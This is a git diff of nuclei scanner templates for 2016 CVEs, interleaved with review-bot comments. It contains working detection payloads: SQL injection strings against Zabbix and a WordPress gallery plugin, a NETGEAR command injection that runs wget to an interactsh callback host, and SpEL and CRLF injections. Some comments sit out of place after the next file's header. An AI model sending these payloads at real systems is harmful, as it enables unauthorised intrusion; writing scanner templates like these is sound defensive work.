100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml 
@@ -4,14 +4,18 @@ info: name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + - https://wordpress.org/plugins/simpel-reserveren + - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 + - http://www.securityfocus.com/bid/93582 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index d44cabdaa9..897d14916e 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin tidio-form v1.0 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 + - https://wordpress.org/plugins/tidio-form + - http://www.securityfocus.com/bid/93579 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index 8e9ef8b66c..3b55e0bdd3 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml 
@@ -4,14 +4,18 @@ info: name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin tidio-gallery v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 + - https://wordpress.org/plugins/tidio-gallery + - http://www.securityfocus.com/bid/93543 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index dfbff06092..6080409f32 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin whizz v1.0. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 + - https://wordpress.org/plugins/whizz + - http://www.securityfocus.com/bid/93538 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 70f109f44c..bef2178f7b 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml 
@@ -4,14 +4,18 @@ info: name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + - https://wordpress.org/plugins/wpsolr-search-engine + - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 + - http://www.securityfocus.com/bid/93536 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index ff51ed5643..17b510dc45 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml 
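Review bot: The `name` line says `WPSOLR <= 8.6` while the added `description` says `wpsolr-search-engine v7.6`, so the template states two different affected versions for the same CVE. Check which version the cited advisories report and align the other line, e.g. `description: Reflected XSS in wordpress plugin wpsolr-search-engine <= 8.6` if 8.6 is the correct bound. The `requests` section is outside this hunk.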
@@ -1,16 +1,21 @@ id: CVE-2016-10033 + info: - name: Wordpress 4.6 Remote Code Execution + name: WordPress PHPMailer < 5.2.18 Remote Code Execution author: princechaddha severity: critical - description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. - reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - tags: wordpress,cve,cve2016,rce + description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + reference: + - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 + - https://www.exploit-db.com/exploits/40970/ + - https://www.exploit-db.com/exploits/40968/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 + tags: wordpress,cve,cve2016,rce requests: - raw: @@ -47,3 +52,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/04/13 diff --git a/cves/2016/CVE-2016-10134.yaml b/cves/2016/CVE-2016-10134.yaml new file mode 100644 index 0000000000..7429102228 --- /dev/null +++ b/cves/2016/CVE-2016-10134.yaml 
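Review bot: The rewritten `description` lost the backslash: it now reads `via a " (backslash double quote)`, so the parenthetical no longer describes the character shown, and the `\"` sequence is the whole point of the Sender-property injection. Restore it, e.g. `description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.` — a plain YAML scalar keeps `\"` literally, or wrap the value in single quotes to be safe. The raw request that carries the payload is outside this hunk.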
@@ -0,0 +1,38 @@ +id: CVE-2016-10134 + +info: + name: Zabbix - SQL Injection + author: princechaddha + severity: critical + description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. + reference: + - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10134 + - https://support.zabbix.com/browse/ZBX-11023 + - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-10134 + cwe-id: CWE-89 + tags: cve,cve2016,zabbix,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Error in query [INSERT INTO profiles (profileid, userid' + - 'You have an error in your SQL syntax' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml index b351b79efe..17f56716bd 100644 --- a/cves/2016/CVE-2016-10924.yaml +++ b/cves/2016/CVE-2016-10924.yaml @@ -9,12 +9,13 @@ info: - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook + - https://wordpress.org/plugins/ebook-download/#developers classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 + tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook requests: - method: GET 
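Review bot: The `description` (NVD wording) names the `toggle_ids` parameter of `latest.php`, but the request exercises `profileIdx2` on `jsrpc.php` with `updatexml(...)`, and nothing in the template explains why the two differ. Add a comment above the `path` entry stating that both reach the same unsanitized `INSERT INTO profiles` (the vulhub reference is the place to cite), and note that `updatexml`, `user()` and the `You have an error in your SQL syntax` string are MySQL-specific, so a vulnerable Zabbix on PostgreSQL will not be flagged by this matcher. Reaching `jsrpc.php` without a session presumably depends on the Zabbix guest account being enabled; if so, say that in the description or a comment so a negative result is not read as "patched".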
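Review bot: The `tags` line moved in the CVE-2016-10924 hunk still carries `cve2021` for a 2016 CVE, so `-tags cve2016` runs skip this template and `cve2021` runs pick it up by mistake. Change it to `tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook`. The request section is outside the hunk.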
diff --git a/cves/2016/CVE-2016-10940.yaml b/cves/2016/CVE-2016-10940.yaml new file mode 100644 index 0000000000..3898a7c31a --- /dev/null +++ b/cves/2016/CVE-2016-10940.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10940 + +info: + name: WordPress zm-gallery plugin 1.0 SQL Injection + author: cckuailong,daffainfo + severity: high + description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + reference: + - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 + - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 + - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2016-10940 + cwe-id: CWE-89 + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' + - 'contains(body_2, "[zm_gallery id=")' + - 'contains(body_2, "")' + - '!contains(body_3, "")' + condition: and + +# Enhanced by mp on 2022/04/12 
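Review bot: As rendered here the third and fourth DSL expressions compare against an empty string — `contains(body_2, "")` and `!contains(body_3, "")` — and under `condition: and` that is a contradiction (`contains(x, "")` is always true, its negation always false), so the matcher could never fire. Most likely HTML markup was stripped from those strings when the page was rendered; verify the committed file carries the real marker that appears only when the TRUE branch of the `CASE` renders the gallery listing, e.g. `contains(body_2, "<marker>")` / `!contains(body_3, "<marker>")`, and consider a comment naming why that marker distinguishes the two responses. The `http://lenonleite.com.br/...` reference duplicates the `https://` entry two lines above and can be dropped.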
diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index e70c75ed3a..25c5fdb2e7 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -8,12 +8,13 @@ info: reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 - tags: cve,cve2016,wordpress,wp-plugin,lfi + - https://wordpress.org/plugins/mail-masta/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,lfi,mail requests: - method: GET @@ -25,8 +26,9 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + - 500 diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 7d70ef5104..2f47dc4085 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml 
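Review bot: The status matcher in the second hunk now also accepts `500`, which is only safe if `matchers-condition: and` is set just above the hunk (that line is outside it) — nuclei defaults to `or`, in which case any 500 response would match regardless of the `root:.*:0:0:` regex. Please confirm the condition is `and`, and add a short comment above `status:` such as `# some vulnerable installs answer 500 while still echoing the included file` so the reason for the extra status survives review. Tightening the regex with the trailing colon is a good change.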
@@ -1,20 +1,21 @@ id: CVE-2016-10960 info: - name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + name: WordPress wSecure Lite < 2.4 - Remote Code Execution author: daffainfo severity: high - description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - tags: cve,cve2016,wordpress,wp-plugin,rce + - https://wordpress.org/plugins/wsecure/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2016-10960 cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,rce requests: - method: POST @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 0f3716e9fe..4d4d53806e 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml 
@@ -4,16 +4,17 @@ info: name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - tags: cve,cve2016,wordpress,wp-theme,xss + - https://wpvulndb.com/vulnerabilities/8431 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 - description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." + tags: cve,cve2016,wordpress,wp-theme,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml new file mode 100644 index 0000000000..0afd89e84c --- /dev/null +++ b/cves/2016/CVE-2016-1555.yaml 
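Review bot: The `name` says `Unauthenticated Reflected Cross-Site Scripting` while the `cvss-metrics` context line carries `PR:L` (privileges required), so the template disagrees with itself about whether the `s` parameter is reachable without a session. If the request (outside this hunk) hits the public search page, the metrics are simply inherited from NVD and a comment saying so would help; otherwise drop `Unauthenticated` from the name.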
@@ -0,0 +1,36 @@ +id: CVE-2016-1555 + +info: + name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection + author: gy741 + severity: critical + description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + reference: + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 + - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic + - http://seclists.org/fulldisclosure/2016/Feb/112 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-1555 + cwe-id: CWE-77 + tags: netgear,rce,oast,router + +requests: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 8111ac538d..fc2306739b 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml 
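Review bot: The `tags` line reads `tags: netgear,rce,oast,router` and, unlike every sibling template in this diff, omits `cve,cve2016`, so `-tags cve2016` runs will skip it; change it to `tags: cve,cve2016,netgear,rce,oast,router`. As rendered here the POST body shows `%23®info=0` — `&reg` appears to have been HTML-decoded to `®` by the renderer; confirm the committed file carries `%23&reginfo=0`, otherwise the `reginfo` parameter is lost and the injection point differs from the PoC. The only matcher is an `interactsh_protocol` check on an outbound `wget`, so a vulnerable device without egress to the interactsh host is reported as clean; `# blind OOB check — requires egress from the device` on the matcher would document that limitation.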
@@ -1,19 +1,21 @@ id: CVE-2016-2004 info: - name: HP Data Protector A.09.00 - Arbitrary Command Execution + name: HP Data Protector - Arbitrary Command Execution author: pussycat0x severity: critical - tags: cve,cve2016,network,iot,hp,rce description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + - http://www.kb.cert.org/vuls/id/267328 + - https://www.exploit-db.com/exploits/39858/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 + tags: cve,cve2016,network,iot,hp,rce network: - inputs: @@ -22,10 +24,12 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:5555" + - "{{Host}}:5555" matchers: - type: word encoding: hex words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index 364e21e9ba..33b554b186 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -8,12 +8,14 @@ info: reference: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 - tags: cve,cve2016,lfi,sap + - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html + - https://www.exploit-db.com/exploits/39837/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-2389 cwe-id: CWE-22 + tags: cve,cve2016,lfi,sap requests: - method: GET 
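Review bot: The added reference `https://www.exploit-db.com/exploits/39858/` duplicates the existing `https://www.exploit-db.com/exploits/39858` two lines above; keep one. The `iot` tag on an enterprise backup product is also odd next to `network,hp` and worth a second look.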
@@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 86662795dc..580529199e 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -9,12 +9,13 @@ info: reference: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html - tags: cve,cve2016,struts,rce,apache + - http://www.securitytracker.com/id/1035665 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2016-3081 cwe-id: CWE-77 + tags: cve,cve2016,struts,rce,apache requests: - raw: diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml index 1a43f975db..ba3b0c90c9 100644 --- a/cves/2016/CVE-2016-3088.yaml +++ b/cves/2016/CVE-2016-3088.yaml 
@@ -1,21 +1,21 @@ id: CVE-2016-3088 info: - name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) + name: Apache ActiveMQ Fileserver - Arbitrary File Write author: fq_hsu severity: critical - description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. + description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. reference: - https://www.exploit-db.com/exploits/40857 - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 - tags: fileupload,cve,cve2016,apache,activemq classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 + tags: fileupload,cve,cve2016,apache,activemq requests: - raw: @@ -38,3 +38,5 @@ requests: - "status_code_2==200" - "contains((body_2), '{{randstr}}')" condition: and + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml new file mode 100644 index 0000000000..601462cf16 --- /dev/null +++ b/cves/2016/CVE-2016-3978.yaml 
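Review bot: The DSL matcher in the second hunk confirms the write by reading `{{randstr}}` back (`status_code_2==200` and `contains((body_2), '{{randstr}}')`), which means a positive result leaves the uploaded file on the target's fileserver, and nothing in the template documents that or cleans it up. The raw PUT/MOVE requests are outside this hunk; above `matchers` add a comment such as `# NOTE: leaves the {{randstr}}-named file on the fileserver — not removed by this template`, and if the fileserver honours DELETE, consider a trailing cleanup request.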
@@ -0,0 +1,29 @@ +id: CVE-2016-3978 + +info: + name: FortiOS (Fortinet) - Open Redirect and XSS + author: 0x_Akoko + severity: medium + description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." + reference: + - https://seclists.org/fulldisclosure/2016/Mar/68 + - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 + - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-3978 + cwe-id: CWE-79 + tags: cve,cve2016,redirect,fortinet,fortios + +requests: + - method: GET + path: + - '{{BaseURL}}/login?redir=http://www.example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml index 1bc031521f..ad77d61eda 100644 --- a/cves/2016/CVE-2016-4975.yaml +++ b/cves/2016/CVE-2016-4975.yaml 
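Review bot: The `description` (NVD wording) names the `"redirect"` parameter while the request uses `redir`, and the `name` promises XSS with `cwe-id: CWE-79` while the only matcher checks a `Location` header, so the template verifies the open redirect only. Align the metadata with what is tested: mention `redir` in the description and add `# only the redirect is verified; the XSS variant is not exercised` above the matcher. The `http://seclists.org/fulldisclosure/2016/Mar/68` reference duplicates the `https://` entry and can be dropped.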
@@ -2,23 +2,28 @@ id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy,sullo - severity: low + author: melbadry9,nadino,xElkomy + severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. - tags: crlf,generic,cves,cve2016 + reference: + - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 + tags: cve,cve2016,crlf,generic,apache requests: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - matchers: - type: regex + part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - part: header + +# Enhanced by cs on 2022/02/14 diff --git a/cves/2016/CVE-2016-4977.yaml b/cves/2016/CVE-2016-4977.yaml new file mode 100644 index 0000000000..48ee87dc33 --- /dev/null +++ b/cves/2016/CVE-2016-4977.yaml 
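Review bot: The payload injects `Set-Cookie:crlfinjection` with no `=value`, but the regex requires `crlfinjection=crlfinjection`, so unless the server rewrites the header the matcher cannot match the line this request actually injects; either send `%0D%0ASet-Cookie:crlfinjection=crlfinjection` or relax the capture to `(crlfinjection(?:=[^;\s]*)?)`. The mismatch predates the commit, but the commit touches the matcher (moving `part: header`) and is the moment to fix it. The hunk also drops `sullo` from `author` with no stated reason; restore it if that was unintended.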
@@ -0,0 +1,37 @@ +id: CVE-2016-4977 + +info: + name: Spring Security OAuth2 Remote Command Execution + author: princechaddha + severity: high + description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + reference: + - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md + - https://tanzu.vmware.com/security/cve-2016-4977 + - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 + - https://pivotal.io/security/cve-2016-4977 + remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2016-4977 + cwe-id: CWE-19 + tags: cve,cve2016,spring,oauth2,oauth,rce,ssti + +requests: + - method: GET + path: + - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Unsupported response types: [978015547]" + + - type: status + status: + - 400 + +# Enhanced by mp on 2022/04/04 diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 40868caf7e..6940b6d489 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml 
